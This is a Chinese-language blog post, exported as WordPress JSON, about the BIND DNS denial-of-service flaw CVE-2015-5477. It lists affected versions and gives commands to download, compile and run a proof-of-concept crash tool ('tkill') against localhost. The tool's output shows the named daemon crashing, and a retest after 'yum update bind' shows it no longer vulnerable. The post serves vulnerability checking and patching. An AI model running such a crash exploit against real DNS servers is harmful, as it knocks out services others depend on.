{"id":417,"date":"2015-08-08T10:30:59","date_gmt":"2015-08-08T02:30:59","guid":{"rendered":"http:\/\/www.ipcpu.com\/?p=417"},"modified":"2015-08-08T10:30:59","modified_gmt":"2015-08-08T02:30:59","slug":"cve-2015-5477","status":"publish","type":"post","link":"https:\/\/c.ipcpu.com\/2015\/08\/cve-2015-5477\/","title":{"rendered":"DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09"},"content":{"rendered":"

DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09<\/p>\n

\u6f0f\u6d1e\u63cf\u8ff0<\/h3>\n

\u8fd1\u671fISC\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff08cve-2015-5477),\u8be5\u6f0f\u6d1e\u5f71\u54cd\u5f53\u524dBind\u6240\u6709\u975e\u6700\u65b0\u7248\u672c\uff0c\u9ed1\u5ba2\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5bf9BIND DNS\u670d\u52a1\u8fdb\u884cDOS\u653b\u51fb\uff0c\u5bfc\u81f4DNS\u670d\u52a1\u8fdb\u7a0b\u7ed3\u675f\u3002<\/p>\n

\u6f0f\u6d1e\u5f71\u54cd<\/h3>\n

\u81ea\u7f16\u8bd1\u7248\u672c 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2
Redhat AS6 \u7248\u672c < bind-9.8.2-0.37.rc1.el6_7.2\u7248\u672c
Redhat AS5 \u7248\u672c < bind-9.3.6-25.P1.el5_11.3 \u7248\u672c<\/p>\n

\u6f0f\u6d1e\u6d4b\u8bd5<\/h3>\n

\u975e\u5e38\u5371\u9669\uff0c\u8bf7\u52ff\u6d4b\u8bd5\u7ebf\u4e0a\u670d\u52a1\u2014\u2014\u5b58\u5728\u6f0f\u6d1e\u7684DNS\u670d\u52a1\u5b88\u62a4\u8fdb\u7a0b\u4f1acrash<\/strong>
A. \u6d4b\u8bd5\u65b9\u6cd5<\/p>\n

  1. [@<\/span> <\/span>~]#<\/span> wget http<\/span>:<\/span>\/\/NOTVALID\/script\/tkill.c<\/span><\/code><\/li>
  2. [@<\/span> <\/span>~]#<\/span> gcc <\/span>-<\/span>g <\/span>-<\/span>o tkill tkill<\/span>.<\/span>c<\/span><\/code><\/li>
  3. [@<\/span> <\/span>~]#<\/span> chmod a<\/span>+<\/span>x tkill<\/span><\/code><\/li>
  4. [@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
  5. #\u5982DNS\u670d\u52a1crash\uff0c\u8bf4\u660e\u8be5DNS\u5b58\u5728\u6f0f\u6d1e\uff0c\u5982\u51fa\u73b0 not vulnerable\u5b57\u6837\uff0c\u5219\u8868\u793a\u6f0f\u6d1e\u672a\u751f\u6548\u3002<\/span><\/code><\/li><\/ol><\/pre>\n
    B.    \u6d4b\u8bd5\u73b0\u8c61<\/p>\n
    1. [@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
    2. ---<\/span> <\/span>PoC<\/span> <\/span>for<\/span> CVE<\/span>-<\/span>2015<\/span>-<\/span>5477<\/span> BIND9 TKEY <\/span>assert<\/span> <\/span>DoS<\/span> <\/span>---<\/span><\/code><\/li>
    3. [+]<\/span> localhost<\/span>:<\/span> <\/span>Resolving<\/span> to IP address<\/span><\/code><\/li>
    4. [+]<\/span> localhost<\/span>:<\/span> <\/span>Resolved<\/span> to multiple <\/span>IPs<\/span> <\/span>(<\/span>NOTE<\/span>)<\/span><\/code><\/li>
    5. [+]<\/span> <\/span>::<\/span>1<\/span>:<\/span> <\/span>Probing<\/span>...<\/span><\/code><\/li>
    6. [+]<\/span> <\/span>Querying<\/span> version<\/span>...<\/span><\/code><\/li>
    7. [+]<\/span> <\/span>::<\/span>1<\/span>:<\/span> <\/span>\"9.11.0pre-alpha\"<\/span><\/code><\/li>
    8. [+]<\/span> <\/span>Sending<\/span> <\/span>DoS<\/span> packet<\/span>...<\/span><\/code><\/li>
    9. [+]<\/span> <\/span>Waiting<\/span> <\/span>5<\/span>-<\/span>sec <\/span>for<\/span> response<\/span>...<\/span><\/code><\/li>
    10. [+]<\/span> timed <\/span>out<\/span>,<\/span> probably crashed<\/span><\/code><\/li>
    11. [+]<\/span> <\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span> <\/span>Probing<\/span>...<\/span><\/code><\/li>
    12. [+]<\/span> <\/span>Querying<\/span> version<\/span>...<\/span><\/code><\/li>
    13. [-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
    14. [-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
    15. [-]<\/span> timed <\/span>out<\/span> getting version<\/span>,<\/span> trying again<\/span><\/code><\/li>
    16. [-]<\/span> <\/span>Can<\/span>'t query server, is it crashed already?<\/span><\/code><\/li>
    17. [-] Sending exploit anyway.<\/span><\/code><\/li>
    18. [+] Sending DoS packet...<\/span><\/code><\/li>
    19. [+] Waiting 5-sec for response...<\/span><\/code><\/li>
    20. [+] timed out, probably crashed<\/span><\/code><\/li><\/ol><\/pre>\n
      \u7ecf\u68c0\u67e5named\u8fdb\u7a0b\u5df2\u7ecfcrash<\/p>\n
      C.     \u670d\u52a1\u65e5\u5fd7<\/p>\n
      1. Aug<\/span> <\/span>4<\/span> <\/span>15<\/span>:<\/span>32<\/span>:<\/span>48<\/span> dns named<\/span>[<\/span>2717<\/span>]:<\/span> client a<\/span>.<\/span>b<\/span>.<\/span>c<\/span>.<\/span> d<\/span>#42212 (foo.bar): view north_america: query: foo. bar ANY TKEY + (x.y.z.zz)<\/span><\/code><\/li><\/ol><\/pre>\n
        \u89e3\u51b3\u65b9\u6848\uff1a<\/h3>\n
        \u5347\u7ea7\u5230\u6700\u65b0\u7248\uff0c\u624b\u52a8\u7f16\u8bd1\u7248\u672c\u4e5f\u53ef\u4ee5\u6253\u8865\u4e01\u3002<\/p>\n
        \u5b98\u65b9\u7f51\u7ad9\u8c8c\u4f3c\u6ca1\u6709\u8865\u4e01\u5305\uff0c\u53ef\u4ee5\u4eceRedhat\u7684FTP\u63d0\u4f9b\u7684srpm\u6587\u4ef6\u67e5\u627e<\/p>\n
        1. [@<\/span> <\/span>~]#<\/span> yum update bind<\/span><\/code><\/li><\/ol><\/pre>\n
          \u66f4\u65b0\u540e\u7684\u6d4b\u8bd5<\/p>\n
          1. [@<\/span> <\/span>~]#<\/span> <\/span>.\/<\/span>tkill localhost<\/span><\/code><\/li>
          2. ---<\/span> <\/span>PoC<\/span> <\/span>for<\/span> CVE<\/span>-<\/span>2015<\/span>-<\/span>5477<\/span> BIND9 TKEY <\/span>assert<\/span> <\/span>DoS<\/span> <\/span>---<\/span><\/code><\/li>
          3. [+]<\/span> localhost<\/span>:<\/span> <\/span>Resolving<\/span> to IP address<\/span><\/code><\/li>
          4. [+]<\/span> localhost<\/span>:<\/span> <\/span>Resolved<\/span> to multiple <\/span>IPs<\/span> <\/span>(<\/span>NOTE<\/span>)<\/span><\/code><\/li>
          5. [+]<\/span> <\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span> <\/span>Probing<\/span>...<\/span><\/code><\/li>
          6. [+]<\/span> <\/span>Querying<\/span> version<\/span>...<\/span><\/code><\/li>
          7. [+]<\/span> <\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span> <\/span>\"9.3.6-P1-RedHat-9.3.6-25.P1.el5_11.3\"<\/span> <\/span><\/code><\/li>
          8. [+]<\/span> <\/span>Sending<\/span> <\/span>DoS<\/span> packet<\/span>...<\/span><\/code><\/li>
          9. [+]<\/span> <\/span>Waiting<\/span> <\/span>5<\/span>-<\/span>sec <\/span>for<\/span> response<\/span>...<\/span><\/code><\/li>
          10. [-]<\/span> <\/span>127.0<\/span>.<\/span>0.1<\/span>:<\/span> got response<\/span>,<\/span> so probably <\/span>not<\/span> vulnerable<\/span><\/code><\/li><\/ol><\/pre>\n
            \u76f8\u5173\u94fe\u63a5\uff1a<\/h3>\n
            http:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2015-5477<\/a>
            http:\/\/www.isc.org\/downloads<\/a>
            https:\/\/ring0.me\/2015\/08\/exploit-dns-server-with-one-packet\/<\/a><\/p>\n
            \u8f6c\u8f7d\u8bf7\u6ce8\u660e\uff1aIPCPU-\u7f51\u7edc\u4e4b\u8def<\/a> » DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09<\/a><\/p>","protected":false},"excerpt":{"rendered":"
            DNS\u670d\u52a1\u5668\u8f6f\u4ef6BIND\u66dd\u4e25\u91cdDoS\u6f0f\u6d1e\uff08CVE-2015-5477\uff09 \u6f0f\u6d1e\u63cf\u8ff0 \u8fd1\u671fISC\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u6f0f\u6d1e\uff08cve-2015-5477),\u8be5\u6f0f\u6d1e\u5f71\u54cd\u5f53\u524dBind\u6240\u6709\u975e\u6700\u65b0\u7248\u672c\uff0c\u9ed1\u5ba2\u53ef\u4ee5\u5229\u7528\u8be5\u6f0f\u6d1e\u5bf9BIND DNS\u670d\u52a1\u8fdb\u884cDOS\u653b\u51fb\uff0c\u5bfc\u81f4DNS\u670d\u52a1\u8fdb\u7a0b\u7ed3\u675f\u3002 \u6f0f\u6d1e\u5f71\u54cd \u81ea\u7f16\u8bd1\u7248\u672c 9.1.0 -> 9.8.x, 9.9.0->9.9.7-P1, 9.10.0->9.10.2-P2Redhat AS6 \u7248\u672c < bind-9.8.2-0.37.rc1.el6_7.2\u7248\u672cRedhat AS5 \u7248\u672c < bind-9.3.6-25.P1.el5_11.3 \u7248\u672c \u6f0f\u6d1e\u6d4b\u8bd5 \u975e\u5e38\u5371\u9669\uff0c\u8bf7\u52ff\u6d4b\u8bd5\u7ebf\u4e0a\u670d\u52a1\u2014\u2014\u5b58\u5728\u6f0f\u6d1e\u7684DNS\u670d\u52a1\u5b88\u62a4\u8fdb\u7a0b\u4f1acrashA. \u6d4b\u8bd5\u65b9\u6cd5 [@ ~]# wget http:\/\/NOTVALID\/script\/tkill.c[@ ~]# gcc -g -o tkill tkill.c[@ ~]# chmod a+x tkill[@ ~]# .\/tkill localhost#\u5982DNS\u670d\u52a1crash\uff0c\u8bf4\u660e\u8be5DNS\u5b58\u5728\u6f0f\u6d1e\uff0c\u5982\u51fa\u73b0 not vulnerable\u5b57\u6837\uff0c\u5219\u8868\u793a\u6f0f\u6d1e\u672a\u751f\u6548\u3002 B. \u6d4b\u8bd5\u73b0\u8c61 [@ ~]# .\/tkill localhost— PoC for CVE-2015-5477 BIND9 TKEY assert DoS […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":[],"categories":[3,13],"tags":[35,15,36],"_links":{"self":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts\/417"}],"collection":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/comments?post=417"}],"version-history":[{"count":0,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/posts\/417\/revisions"}],"wp:attachment":[{"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/media?parent=417"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/categories?post=417"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/c.ipcpu.com\/wp-json\/wp\/v2\/tags?post=417"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}